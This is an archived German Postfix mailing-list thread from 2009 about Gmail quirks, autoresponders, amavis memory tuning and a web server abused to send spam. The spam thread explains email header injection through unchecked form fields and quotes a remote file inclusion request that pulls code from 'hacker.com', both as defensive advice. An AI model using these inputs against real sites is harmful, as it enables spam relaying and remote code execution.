(GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iD8DBQFKd05D1cxPeQKB3GIRAvtyAJ4vCsgM8SlXXsjbBpdpaIfqFopoNgCePAee hdAbwJ/DM84/JIK3idT4UkU= =8SCu -----END PGP SIGNATURE----- From cite+postfix-buch at incertum.net Mon Aug 3 23:50:44 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Mon, 3 Aug 2009 23:50:44 +0200 Subject: [Postfixbuch-users] Googlemail frisst Mails In-Reply-To: <4A774E44.3010102@carsten-brandt.eu> References: <000101ca0341$a1cc9fa0$0601a8c0@emnpc2> <200908031743.05237.p.heinlein@heinlein-support.de> <4A7710B3.1000803@carsten-brandt.eu> <200908032126.53822.p.heinlein@heinlein-support.de> <4A774E44.3010102@carsten-brandt.eu> Message-ID: <20090803215044.GA16421@mail.incertum.net> * Carsten Brandt : > Okay, das ist in der Tat ein wenig dumm, aber sie taucht wenigstens auf. > Die besagten Mails sind bei Google allerdings nirgens zu finden, weder > in Inbox, Spam oder Trash. Die sollte sich unter "All Mail" bzw. "Sent Mail" finden - Google geht davon aus, daß die Mail an eine Mailingliste gesandt wurde. Schuß in's Blaue Stefan From listen at papernet.de Mon Aug 3 23:59:40 2009 From: listen at papernet.de (Matthias Ebner) Date: Mon, 3 Aug 2009 23:59:40 +0200 Subject: [Postfixbuch-users] Googlemail frisst Mails In-Reply-To: <20090803215044.GA16421@mail.incertum.net> Message-ID: <001801ca1485$b4101840$0601a8c0@emnpc2> Stefan Förster schrieb am Montag, den 3. August 2009 > Die sollte sich unter "All Mail" bzw. "Sent Mail" finden - Google geht > davon aus, daß die Mail an eine Mailingliste gesandt wurde. > > > Schuß in's Blaue Der ging daneben. Die Mails finden sich nirgends. Ich habe daher sämtliche System-Mails auf einen anderen Provider umgeleitet. Stärkt nicht gerade das Vertrauen in Google-Mail :-( Gruß Matthias From lists at carsten-brandt.eu Tue Aug 4 00:07:30 2009 From: lists at carsten-brandt.eu (Carsten Brandt) Date: Tue, 04 Aug 2009 00:07:30 +0200 Subject: [Postfixbuch-users] Googlemail frisst Mails In-Reply-To: <20090803215044.GA16421@mail.incertum.net> References: <000101ca0341$a1cc9fa0$0601a8c0@emnpc2> <200908031743.05237.p.heinlein@heinlein-support.de> <4A7710B3.1000803@carsten-brandt.eu> <200908032126.53822.p.heinlein@heinlein-support.de> <4A774E44.3010102@carsten-brandt.eu> <20090803215044.GA16421@mail.incertum.net> Message-ID: <4A775FA2.1060503@carsten-brandt.eu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Stefan Förster schrieb: > * Carsten Brandt : >> Okay, das ist in der Tat ein wenig dumm, aber sie taucht wenigstens auf. >> Die besagten Mails sind bei Google allerdings nirgens zu finden, weder >> in Inbox, Spam oder Trash. > > Die sollte sich unter "All Mail" bzw. "Sent Mail" finden - Google geht > davon aus, daß die Mail an eine Mailingliste gesandt wurde. Klar, in Sent-Mails findet sie sich, da ist sie aber auch schon bevor sie von meinem Server wieder eingeliefert wurde. Hm... die Logik zieht, ist nur eigentlich nicht Sinn der Sache bzw. eigentlich auch nicht erlaubt. Sie müsste ja erneut im Posteingang auftauchen, weil er sie über SMTP empfangen hat... mal schaun was sie selbst dazu zu sagen haben, warte ja noch auf Antwort... MfG Carsten -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iD8DBQFKd1+e1cxPeQKB3GIRAql2AJ9oH2c6B6zK9AHprjXrnWYAVEufYACeJiRz XgQY75TrJg5IDRTLim9dTk0= =Fhzd -----END PGP SIGNATURE----- From cite+postfix-buch at incertum.net Tue Aug 4 00:15:14 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Tue, 4 Aug 2009 00:15:14 +0200 Subject: [Postfixbuch-users] Googlemail frisst Mails In-Reply-To: <4A775FA2.1060503@carsten-brandt.eu> References: <000101ca0341$a1cc9fa0$0601a8c0@emnpc2> <200908031743.05237.p.heinlein@heinlein-support.de> <4A7710B3.1000803@carsten-brandt.eu> <200908032126.53822.p.heinlein@heinlein-support.de> <4A774E44.3010102@carsten-brandt.eu> <20090803215044.GA16421@mail.incertum.net> <4A775FA2.1060503@carsten-brandt.eu> Message-ID: <20090803221514.GB16421@mail.incertum.net> * Carsten Brandt : > Stefan Förster schrieb: >> Die sollte sich unter "All Mail" bzw. "Sent Mail" finden - Google geht >> davon aus, daß die Mail an eine Mailingliste gesandt wurde. > > Klar, in Sent-Mails findet sie sich, da ist sie aber auch schon bevor > sie von meinem Server wieder eingeliefert wurde. > Hm... die Logik zieht, ist nur eigentlich nicht Sinn der Sache bzw. > eigentlich auch nicht erlaubt. Sie müsste ja erneut im Posteingang > auftauchen, weil er sie über SMTP empfangen hat... mal schaun was sie > selbst dazu zu sagen haben, warte ja noch auf Antwort... http://mail.google.com/support/bin/answer.py?hl=en&answer=6588 Gute Nacht Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #36: Selbsterklärend - Handbuch gegen Aufpreis (Peter Berlich) From postfixbuch at cboltz.de Tue Aug 4 00:18:30 2009 From: postfixbuch at cboltz.de (Christian Boltz) Date: Tue, 4 Aug 2009 00:18:30 +0200 Subject: [Postfixbuch-users] Googlemail frisst Mails In-Reply-To: <4A76F91C.1010600@carsten-brandt.eu> References: <000101ca0341$a1cc9fa0$0601a8c0@emnpc2> <4A76F91C.1010600@carsten-brandt.eu> Message-ID: <200908040018.30827@tux.boltz.de.vu> Hallo Carsten, hallo Leute, Am Montag, 3. August 2009 schrieb Carsten Brandt: > Jemand sendet von Gmail an eine Adresse bei mir, die auf seinen Gmail > Account weiterleitet, also quasi über einen Umweg an sich selbst. IIRC "frisst" GMail die Mail dann als Duplikat, weil sie ja schon bekannt ist. Zumindest gab es sowas (auch in Zusammenhang mit eigenen Mails an Mailinglisten) schon öfter hier zu lesen. Warum GMail das macht, kann ich Dir allerdings auch nicht erklären - vermutlich sitzt dort jemand, der Dir das sogar als (IMHO zweifelhaftes) Feature verkauft ;-) Kurzfassung: Wenn man sich selbst Mails schicken will, ist GMail eine schlechte Wahl. Gruß Christian Boltz -- Linux ist ein tolles Dings..... Es zeigt mir jeden Tag wieder völlig unaufdringlich meine Grenzen, und zeigt mir was ich alles noch nicht weiß.... [Axel Birndt in suse-linux] From bjoern.meier at googlemail.com Tue Aug 4 10:18:59 2009 From: bjoern.meier at googlemail.com (=?ISO-8859-1?Q?Bj=F6rn?= Meier) Date: Tue, 04 Aug 2009 10:18:59 +0200 Subject: [Postfixbuch-users] "Out of Office" - Infomails In-Reply-To: References: Message-ID: <1249373939.4332.19.camel@ace> Am Montag, den 03.08.2009, 15:54 +0200 schrieb Thomas Gelf: > Weil wir gerade so schön am Autorespondern sind: mich würde echt mal > interessieren, welche Autoresponder denn so genutzt werden?! Die, die > jetzt laut "KEINE" schreien wollen: bitte haltet euch zurück, ich bin > voll eurer Meinung - meine Frage ist aber dennoch ernst gemeint. Exchange Server 2007 > - Was fehlt hier noch? Sicher jede Menge, bin schon gespannt! -Auslassen von Maillists (Muah, wie ich Autoresponder auf MLs widerlich finde) -Interpretieren von globalen configfiles -unterschiedliche textfiles möglich für remote und local domains (So wie es Exchange auch macht) -evt. interpretieren von ~/.ar/.autorespondlocal ~/.ar/.autorespondremote und ~/.ar/.ignoreReply DAS wäre dann echt schick, dann bastel ich dafür noch eine GTK-Oberfläche (oder ein Evolution plugin) und dann hätte man was nettes. Mh, mir kommt gerade eine Schweinerei in den Sinn: Fehlercode dafür missbrauchen, damit man für Autoresponder nicht noch traffic verbraucht? Quasi wie "Mailbox voll", nur dann halt "User temporary unavailable: Bin im Urlaub". Hätte zumindest den Vorteil, dass es nur lokal gebounced wird. Streng genommen wäre es ja ein temporärer Fehler. Gruß, Björn From fox at linuser.de Tue Aug 4 10:36:40 2009 From: fox at linuser.de (Alexander Fox) Date: Tue, 04 Aug 2009 10:36:40 +0200 Subject: [Postfixbuch-users] clamav & amavisd optimieren Message-ID: <4A77F318.3080801@linuser.de> Hallo Postfixbuch Liste, Ich hab das problem das ich auf einem vserver nur 300MB arbeitspeicher zur verfügung habe.Wenn ein hohes Mailaufkommen ist, stürzt clamav ab. Gibt es eine möglichkeit amavisd zu optimieren. Wenn jemand eine Idee hat und noch ne config benötigt, kann er die gerne bekommen. $final_virus_destiny = D_DISCARD; # (data not lost, see virus quarantine) $final_banned_destiny = D_BOUNCE; # D_REJECT when front-end MTA $final_spam_destiny = D_BOUNCE; $final_bad_header_destiny = D_PASS; # False-positive prone (for spam) Gruß Alex From thomas at gelf.net Tue Aug 4 10:52:12 2009 From: thomas at gelf.net (Thomas Gelf) Date: Tue, 04 Aug 2009 10:52:12 +0200 Subject: [Postfixbuch-users] clamav & amavisd optimieren In-Reply-To: <4A77F318.3080801@linuser.de> References: <4A77F318.3080801@linuser.de> Message-ID: Alexander Fox schrieb: > Ich hab das problem das ich auf einem vserver nur 300MB arbeitspeicher > zur verfügung habe.Wenn ein hohes > Mailaufkommen ist, stürzt clamav ab. Gibt es eine möglichkeit amavisd > zu optimieren. Wenn jemand eine Idee > hat und noch ne config benötigt, kann er die gerne bekommen. Der schnellste Weg zum RAM sparen: $max_servers reduzieren. Und noch ein Tipp: mit 32bit fahren, Amavisd-new braucht auf 64bit-Architekturen VIEL mehr Arbeitsspeicher. Mit liebem Gruß Thomas Gelf From leo.unglaub at gmail.com Tue Aug 4 10:54:44 2009 From: leo.unglaub at gmail.com (Leo Unglaub) Date: Tue, 4 Aug 2009 10:54:44 +0200 Subject: [Postfixbuch-users] clamav & amavisd optimieren In-Reply-To: <4A77F318.3080801@linuser.de> References: <4A77F318.3080801@linuser.de> Message-ID: Hallo ! 300MB ist nicht wirklich viel, aber es kommt darauf an, was da alles drauf läuft. Postfix und amavis alleine sollte nicht so das Problem sein, aber wenn dann noch apache, ftp, mysql, ... dazukommen wird es wirklich sehr eng. Des weiteren wäre es wichtig zu wissen was bei dir ein hohes Mailaufkommen ist. Von wie vielen Mails reden wir da? Eine Möglichkeit wäre es einfach die Anzahl der smtpd/amavisd Prozesse zu limitieren, dadurch würdest du die Ressourcen besser verwalten können. Hätte zwar zur folge, dass Mails öfter mit 4xx abgewiesen werden, aber das sollte kein Problem sein. Viele Grüße Leo Am 4. August 2009 10:36 schrieb Alexander Fox : > Hallo Postfixbuch Liste, > > Ich hab das problem das ich auf einem vserver nur 300MB arbeitspeicher zur > verfügung habe.Wenn ein hohes > Mailaufkommen ist, stürzt clamav ab. Gibt es eine möglichkeit amavisd zu > optimieren. Wenn jemand eine Idee > hat und noch ne config benötigt, kann er die gerne bekommen. > > $final_virus_destiny = D_DISCARD; # (data not lost, see virus > quarantine) > $final_banned_destiny = D_BOUNCE; # D_REJECT when front-end MTA > $final_spam_destiny = D_BOUNCE; > $final_bad_header_destiny = D_PASS; # False-positive prone (for spam) > -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From Ralf.Hildebrandt at charite.de Tue Aug 4 10:58:09 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Tue, 4 Aug 2009 10:58:09 +0200 Subject: [Postfixbuch-users] clamav & amavisd optimieren In-Reply-To: <4A77F318.3080801@linuser.de> References: <4A77F318.3080801@linuser.de> Message-ID: <20090804085809.GB10438@charite.de> * Alexander Fox : > Hallo Postfixbuch Liste, > > Ich hab das problem das ich auf einem vserver nur 300MB > arbeitspeicher zur verfügung habe.Wenn ein hohes > Mailaufkommen ist, stürzt clamav ab. Und dann? > Gibt es eine möglichkeit amavisd zu optimieren. Wenn jemand eine Idee > hat und noch ne config benötigt, kann er die gerne bekommen. Weniger amavisd Prozesse laufen lassen -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From thomas at gelf.net Tue Aug 4 11:21:30 2009 From: thomas at gelf.net (Thomas Gelf) Date: Tue, 04 Aug 2009 11:21:30 +0200 Subject: [Postfixbuch-users] "Out of Office" - Infomails In-Reply-To: <1249373939.4332.19.camel@ace> References: <1249373939.4332.19.camel@ace> Message-ID: Björn Meier schrieb: > Exchange Server 2007 Ist auch ok (duck) ;-) > -Auslassen von Maillists (Muah, wie ich Autoresponder auf MLs widerlich finde) > > - Keine Antwort an Mails mit List-* Headern Sollte bereits abgedeckt sein ;-) > - unterschiedliche textfiles möglich für remote und local domains (So wie es > Exchange auch macht) Hmmmm... ich hatte jetzt mehr die ISP-Sicht im Blick, die Unterscheidung von "remote und local domains" ist da relativ witzlos - was nicht heißt, dass man dieses Feature nicht einbauen sollte! > - Interpretieren von globalen configfiles > - evt. interpretieren von ~/.ar/.autorespondlocal ~/.ar/.autorespondremote > und ~/.ar/.ignoreReply Interpretieren von Configfiles: aktuell arbeitet das Ding ausschließlich DB-basiert und funktioniert so, dass die Query welche für Postfix die Aliases besorgt bei aktivierter "Urlaubsbenachrichtigung" zudem einen Alias auf den Autoresponder-Transport zurückliefert. Um wirklich jeden glücklich zu machen, sollte der Config-Teil also modular sein: Unterstützung für .wasauchimmer-Files, für Sieve... was gibt es denn da eigentlich alles? > DAS wäre dann echt schick, dann bastel ich dafür noch eine GTK-Oberfläche > (oder ein Evolution plugin) und dann hätte man was nettes. Hmmm... in meinem Fall würde das lediglich "Plugin für Horde/IMP" bedeu- ten - Unterstützung für eine Serie von MUA's ist natürlich auch ein interessanter Ansatz. Leider ist mir noch kein wirklicher Standard für derlei Operationen bekannt, Sieve wird in der MS-Welt wohl kaum Anklang finden, was anderes ist mir noch nicht untergekommen. Wer klärt mich auf? > Mh, mir kommt gerade eine Schweinerei in den Sinn: Fehlercode dafür > missbrauchen, damit man für Autoresponder nicht noch traffic verbraucht? > Quasi wieMailbox voll", nur dann halt "User temporary unavailable: Bin im > Urlaub". > > Hätte zumindest den Vorteil, dass es nur lokal gebounced wird. Streng > genommen wäre es ja ein temporärer Fehler. Halte das für keine gute Idee. Zwar steigt in Zeiten von Kurzarbeit und Zwangs-Urlaub sicher der Autoresponder-Traffic - die Lösung mit dem Fehlercode hat aber ein paar entscheidende Nachteile: - das Mail liegt nicht in deiner Mailbox, erreicht dich nicht auf deinem Blackberry (es soll ja Leute geben, die trotz Autoresponder im Urlaub dennoch jedes zweite Mail beantworten) - du hast keine Kontrolle über den Inhalt, Sprache und Optik der Rückantwort - hast du eine Ahnung, wie kreativ die Leute im erstellen von Filtern für Mails von Mailer-Daemon & Co sind? Aber lass uns ruhig ein wenig weiter brainstormen - vielleicht kommt am Ende ja Oayaar (Once Again Yet Another AutoResponder) dabei heraus :p Mit liebem Gruß Thomas Gelf From fox at linuser.de Tue Aug 4 11:23:03 2009 From: fox at linuser.de (Alexander Fox) Date: Tue, 04 Aug 2009 11:23:03 +0200 Subject: [Postfixbuch-users] clamav & amavisd optimieren In-Reply-To: <20090804085809.GB10438@charite.de> References: <4A77F318.3080801@linuser.de> <20090804085809.GB10438@charite.de> Message-ID: <4A77FDF7.6010002@linuser.de> Am 04.08.2009 10:58, schrieb Ralf Hildebrandt: > * Alexander Fox: > >> Hallo Postfixbuch Liste, >> >> Ich hab das problem das ich auf einem vserver nur 300MB >> arbeitspeicher zur verfügung habe.Wenn ein hohes >> Mailaufkommen ist, stürzt clamav ab. >> > Und dann? > Aug 3 16:53:57 server1 amavis[9396]: (09396-03) (!)ClamAV-clamd: Can't connect to UNIX socket /var/run/clamav/clamd.ctl: 111, retrying (2) Aug 3 16:54:03 server1 amavis[9396]: (09396-03) (!!)ClamAV-clamd av-scanner FAILED: run_av error: Too many retries to talk to /var/run/clamav/clamd.ctl (Can't connect to UNIX socket /var/run/clamav/clamd.ctl: Connection refused) at (eval 88) line 309. Aug 3 16:54:03 server1 amavis[9396]: (09396-03) (!!)WARN: all primary virus scanners failed, considering backups > >> Gibt es eine möglichkeit amavisd zu optimieren. Wenn jemand eine Idee >> hat und noch ne config benötigt, kann er die gerne bekommen. >> > Weniger amavisd Prozesse laufen lassen > in meinster master.cf steht folgendes amavis unix - - - - 2 smtp -o smtp_data_done_timeout=1200 -o smtp_send_xforward_command=yes 127.0.0.1:10025 inet n - - - - smtpd -o content_filter= -o local_recipient_maps= -o relay_recipient_maps= -o smtpd_restriction_classes= -o smtpd_client_restrictions= -o smtpd_helo_restrictions= -o smtpd_sender_restrictions= -o smtpd_recipient_restrictions=permit_mynetworks,reject -o mynetworks=127.0.0.0/8 -o strict_rfc821_envelopes=yes -o receive_override_options=no_unknown_recipient_checks,no_header_body_checks -o smtpd_bind_address=127.0.0.1 From Ralf.Hildebrandt at charite.de Tue Aug 4 11:24:59 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Tue, 4 Aug 2009 11:24:59 +0200 Subject: [Postfixbuch-users] clamav & amavisd optimieren In-Reply-To: <4A77FDF7.6010002@linuser.de> References: <4A77F318.3080801@linuser.de> <20090804085809.GB10438@charite.de> <4A77FDF7.6010002@linuser.de> Message-ID: <20090804092459.GL10438@charite.de> * Alexander Fox : > Aug 3 16:53:57 server1 amavis[9396]: (09396-03) (!)ClamAV-clamd: > Can't connect to UNIX socket /var/run/clamav/clamd.ctl: 111, retrying > (2) > Aug 3 16:54:03 server1 amavis[9396]: (09396-03) (!!)ClamAV-clamd > av-scanner FAILED: run_av error: Too many retries to talk to > /var/run/clamav/clamd.ctl (Can't connect to UNIX socket > /var/run/clamav/clamd.ctl: Connection refused) at (eval 88) line 309. > Aug 3 16:54:03 server1 amavis[9396]: (09396-03) (!!)WARN: all > primary virus scanners failed, considering backups Es gibt sowas wie "runit" -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From thomas at gelf.net Tue Aug 4 11:35:43 2009 From: thomas at gelf.net (Thomas Gelf) Date: Tue, 04 Aug 2009 11:35:43 +0200 Subject: [Postfixbuch-users] [OT] Re: "Out of Office" - Infomails In-Reply-To: <1249373939.4332.19.camel@ace> References: <1249373939.4332.19.camel@ace> Message-ID: Björn Meier schrieb: > -Auslassen von Maillists (Muah, wie ich Autoresponder auf MLs widerlich finde) War ja klar: > From: > Date: Tue, 4 Aug 2009 11:25:02 +0200 (CEST) > Subject: Autoreply zu Ihrer Mail: Subject: Re: [Postfixbuch-users] > "Out of Office" - Infomails > > Leider bin ich bis zum 31. August 2009 nicht erreichbar und kann ihre > eMail erst danach bearbeiten. > > In dringenden Fällen wenden Sie sich bitte an meinen Kollegen Dr. > Martin Diruf. Sie erreichen Ihn unter: > martin.diruf at bodyhey.com > > Mit freundlichen Grüßen, > Alexander Henz > > ----------------- > Dies ist eine automatisch generierte Mail. Q.E.D. Aaaaaaaargh!! Und nachdem hier selbstverständlich auch keine Header Auskunft darüber geben, dass das ein Autoresponder wäre, hier noch ein weiterer Vorschlag: - Kein Reply an Mails mit /Subject: Autoreply.*/i Hat jemand die Header einer Autoreply-Nachricht von Exchange (idealer- weise unterschiedliche Versionen) griffbereit? Mit liebem Gruß Thomas Gelf From postfix at online-webservice24.de Tue Aug 4 16:17:11 2009 From: postfix at online-webservice24.de (Online-WebService24 - Postfix) Date: Tue, 4 Aug 2009 16:17:11 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Spam_=FCber_www-data?= Message-ID: hallo liste, ich habe mal ne frage, mein server versendet über www-data spammails ... kann ich das unterbinden ??? wie bekomm ich raus, wie die das machen ??? über ne antwort wäre ich froh ... mfg srv1:~# postconf -n alias_database = hash:/etc/aliases alias_maps = $alias_database biff = no bounce_size_limit = 51200000 broken_sasl_auth_clients = yes command_directory = /usr/sbin config_directory = /etc/postfix content_filter = smtp-amavis:[127.0.0.1]:10024 daemon_directory = /usr/lib/postfix default_destination_concurrency_limit = 20 delay_warning_time = 4h disable_vrfy_command = yes header_checks = pcre:/etc/postfix/header_checks.pcre local_destination_concurrency_limit = 2 local_destination_recipient_limit = 1 local_recipient_maps = unix:passwd.byname $alias_database local_transport = local mail_spool_directory = /var/mail mailbox_command = procmail -a "$EXTENSION" mailbox_size_limit = 153800000 message_size_limit = 51200000 mydomain = srv1.online-webservice24.de mynetworks = 127.0.0.1 , 85.88.6.105 mynetworks_style = host sendmail_path = /usr/sbin/sendmail smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU) smtpd_client_restrictions = smtpd_helo_required = yes smtpd_helo_restrictions = smtpd_recipient_restrictions = permit_mynetworks, reject_unlisted_recipient, reject_unknown_sender_domain, reject_unknown_recipient_domain, reject_non_fqdn_recipient, permit_sasl_authenticated, permit_mynetworks, reject_unauth_destination, check_recipient_access hash:/etc/postfix/recipient_checks, reject_invalid_hostname, reject_unauth_pipelining, reject_non_fqdn_hostname, check_sender_mx_access cidr:/etc/postfix/bogus_mx, check_policy_service inet:127.0.0.1:60000, permit smtpd_sasl_auth_enable = yes smtpd_sasl_local_domain = online-webservice24.de #vhcs.net smtpd_sasl_security_options = noanonymous smtpd_sender_restrictions = strict_rfc821_envelopes = yes unknown_local_recipient_reject_code = 554 virtual_alias_maps = mysql:/etc/postfix/mysql-virtual_alias_maps.cf virtual_gid_maps = static:2000 virtual_mailbox_base = /var/kunden/mail/ virtual_mailbox_domains = mysql:/etc/postfix/mysql-virtual_mailbox_domains.cf virtual_mailbox_maps = mysql:/etc/postfix/mysql-virtual_mailbox_maps.cf virtual_uid_maps = static:2000 -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From Ralf.Hildebrandt at charite.de Tue Aug 4 16:29:52 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Tue, 4 Aug 2009 16:29:52 +0200 Subject: [Postfixbuch-users] =?utf-8?q?Spam_=C3=BCber_www-data?= In-Reply-To: References: Message-ID: <20090804142952.GZ23901@charite.de> * Online-WebService24 - Postfix : > hallo liste, > > ich habe mal ne frage, mein server versendet über www-data spammails ... > kann ich das unterbinden ??? Webserver abstellen > wie bekomm ich raus, wie die das machen ??? Schlechtes webformular oder so Logs von Mail korrelieren mit HTTP/POST requests -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From sebastian at debianfan.de Tue Aug 4 16:35:24 2009 From: sebastian at debianfan.de (=?iso-8859-1?Q?Sebastian_Dei=DFner?=) Date: Tue, 4 Aug 2009 16:35:24 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Fw=3A__Spam_=FCber_www-data?= Message-ID: <1B7F2D517B12439D9AE206249383CF18@vstahome> ----- Original Message ----- From: "Online-WebService24 - Postfix" To: "'Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein.'" Sent: Tuesday, August 04, 2009 4:17 PM Subject: [Postfixbuch-users] Spam über www-data > hallo liste, > > ich habe mal ne frage, mein server versendet über www-data spammails ... > kann ich das unterbinden ??? > wie bekomm ich raus, wie die das machen ??? > > über ne antwort wäre ich froh ... > ich würde auf ein php-Skript eines Kunden tippen From mailinglists at stefanhoth.de Tue Aug 4 16:40:21 2009 From: mailinglists at stefanhoth.de (Stefan Hoth) Date: Tue, 04 Aug 2009 16:40:21 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Spam_=FCber_www-data?= In-Reply-To: References: Message-ID: <4A784855.6030705@stefanhoth.de> Hallo, > ich habe mal ne frage, mein server versendet über www-data spammails ... > kann ich das unterbinden ??? Ich habe auf meinem Hosting-Server das Versenden via localhost-Einreichung ohne SMTP-Prüfung unterbunden. Es mussten zwar einige Kundenpräsenzen angepasst werden, die noch via PHP-mail() Kontaktwünsche etc versendet haben, aber letztlich ist nun jede abgesendete Mail durch einen angemeldeten SMTP-User eindeutig zuzuordnen. HTH, Stefan From theofel at etes.de Tue Aug 4 16:45:01 2009 From: theofel at etes.de (Jan Theofel) Date: Tue, 4 Aug 2009 16:45:01 +0200 Subject: [Postfixbuch-users] =?iso-8859-15?q?Spam_=FCber_www-data?= In-Reply-To: References: Message-ID: <20090804144501.GA10147@intranet.hq.stgt.etes.de> Hallo, On Tue, Aug 04, 2009 at 04:17:11PM +0200, Online-WebService24 - Postfix wrote: > > ich habe mal ne frage, mein server versendet über www-data spammails ... > kann ich das unterbinden ??? > wie bekomm ich raus, wie die das machen ??? Über Postfix wirst du da nicht viel machen können. Es sei denn du hast keine einzige Webanwendung, irgendwelche Mails an Kunden etc. versendet. (Das ist ja fast überall der Fall.) Primäre musst du dich in diesem Fall um deinen Apache kümmern. Genau genommen um die PHP/Perl/Python/was-auch-immer-Skripte dir da laufen. Vermutlich ist es ein unsicheres Kontaktformular oder so was. Beliebt ist zum Beispiel, dass Sonderzeichen und Newlines in den Variablen nicht unterbunden werden, die in den Header integriert werden. Das Skript schreibt dann z.B. die Absenderadresse ungeprüft so in den Header: From: $from Der Spammer sendet dann ein "\nCc: , , ..." als Absender-E-Mail und schon kann er an beliebige Personen Mails über das Formular versenden. Es gibt aber noch zahlreiche andere Einfallstore in unsicheren Webscripten. Ein Blick in deine Apache-Logfiles hilft vielleicht dabei ungewöhnliche Requests zu erkennen. Den fraglichen Dateien der Webseite(n) solltest du dann erst mal die Rechte entziehen - auch wenn dann Teile der Webseite eben nicht mehr laufen. Jan -- Jan Theofel Mail: theofel at etes.de ETES GmbH Fon : +49 (7 11) 48 90 83 - 17 Gablenberger Hauptstrasse 32 Fax : +49 (7 11) 48 90 83 - 50 D-70186 Stuttgart Web : http://www.etes.de/ Registergericht: Amtsgericht Stuttgart HRB 721182 Geschäftsführende Gesellschafter: Markus Espenhain und Jan Theofel Sitz der Gesellschaft: Stuttgart USt.-Id.Nr.: DE814767446 From thomas at gelf.net Tue Aug 4 17:18:20 2009 From: thomas at gelf.net (Thomas Gelf) Date: Tue, 04 Aug 2009 17:18:20 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Spam_=FCber_www-data?= In-Reply-To: <4A784855.6030705@stefanhoth.de> References: <4A784855.6030705@stefanhoth.de> Message-ID: Stefan Hoth schrieb: >> ich habe mal ne frage, mein server versendet über www-data spammails ... > > Ich habe auf meinem Hosting-Server das Versenden via > localhost-Einreichung ohne SMTP-Prüfung unterbunden. Es mussten zwar > einige Kundenpräsenzen angepasst werden, die noch via PHP-mail() > Kontaktwünsche etc versendet haben, aber letztlich ist nun jede > abgesendete Mail durch einen angemeldeten SMTP-User eindeutig zuzuordnen. Versand via mail() verbieten und lediglich SMTP mit Authentifizierung erlauben ist natürlich der Idealfall, wo dies nicht möglich ist hilft meist sendmail_path = "/usr/sbin/sendmail -t -i -f userxy at mydomain.tld" in der php.ini des Kunden. Wer wirklich noch ernsthaft auf safe_mode und Konsorten setzt (und deshalb keine php.ini pro Kunde hat), der kann diese Einstellung auch via php_admin_value in der VirtualHost- Definition vornehmen. Wie gesagt, mail() verbieten ist besser - diese Funktion hätte in dieser Form nie existieren dürfen. Unser Support-Team würde mir wenn wir das umsetzen würden aber garantiert den Kopf abreißen. Das mit dem sendmail_path klappt aber wunderbar. Habe bisher weder einen Spammer angetroffen, der versucht hätte, diese Einstellung zu über- schrieben hätte, noch einen, der den fünften Parameter von mail() benutzen würde - denn damit schießen sie sich im Falle von safe_mode ja selbst ins Bein. Kurz: sendmail_path ist die pragmatischste, einfachste und sauberste Lösung, die ich für dieses Problem gefunden habe. Ziel ist schließlich, schnell den Übeltäter zu identifizieren - bei vielen tausend Webs ist ein "schneller grep auf die Logs um verdächtige POST-Requests zu finden" nicht immer ganz so einfach wie es klingen mag. Eine 1:1 Zuweisung von Sender zu Web oder Kunde ist hier eine große Hilfe. Wenn das schuldige Web dann identifiziert wurde, empfehle ich dir foldenge Policy anzuwenden: erst abschalten, dann Fragen stellen ;-) Mit liebem Gruß Thomas Gelf From postfix at online-webservice24.de Tue Aug 4 17:40:27 2009 From: postfix at online-webservice24.de (Online-WebService24 - Postfix) Date: Tue, 4 Aug 2009 17:40:27 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Spam_=FCber_www-data?= In-Reply-To: References: <4A784855.6030705@stefanhoth.de> Message-ID: danke für die antwort .... das hab ich mir schon gedacht, nachdem ich 30 min. alle webs aushatte ist auch ruhe ... nu nur ne frage, kenn ihr zufällig nen befehl, womit ich in den hanen logs nachschauen kann, nach dem was ich suche ??? danke From thomas at gelf.net Tue Aug 4 17:57:04 2009 From: thomas at gelf.net (Thomas Gelf) Date: Tue, 04 Aug 2009 17:57:04 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Spam_=FCber_www-data?= In-Reply-To: References: <4A784855.6030705@stefanhoth.de> Message-ID: Online-WebService24 - Postfix schrieb: > nu nur ne frage, kenn ihr zufällig nen befehl, womit ich in den hanen logs > nachschauen kann, nach dem was ich suche ??? Naja, da gibt es mehrere Varianten... ein grep nach POST hilft oft weiter, muss aber nicht sein. Muster wie index.php?page=http%3A%2F%2Fhacker.com/2F/cmd.jpg sind auch nicht selten - usw usw. Der Fantasie sind kaum Grenzen gesetzt :-) Also: viel Spaß beim Suchen! From postfix at online-webservice24.de Tue Aug 4 18:15:36 2009 From: postfix at online-webservice24.de (Online-WebService24 - Postfix) 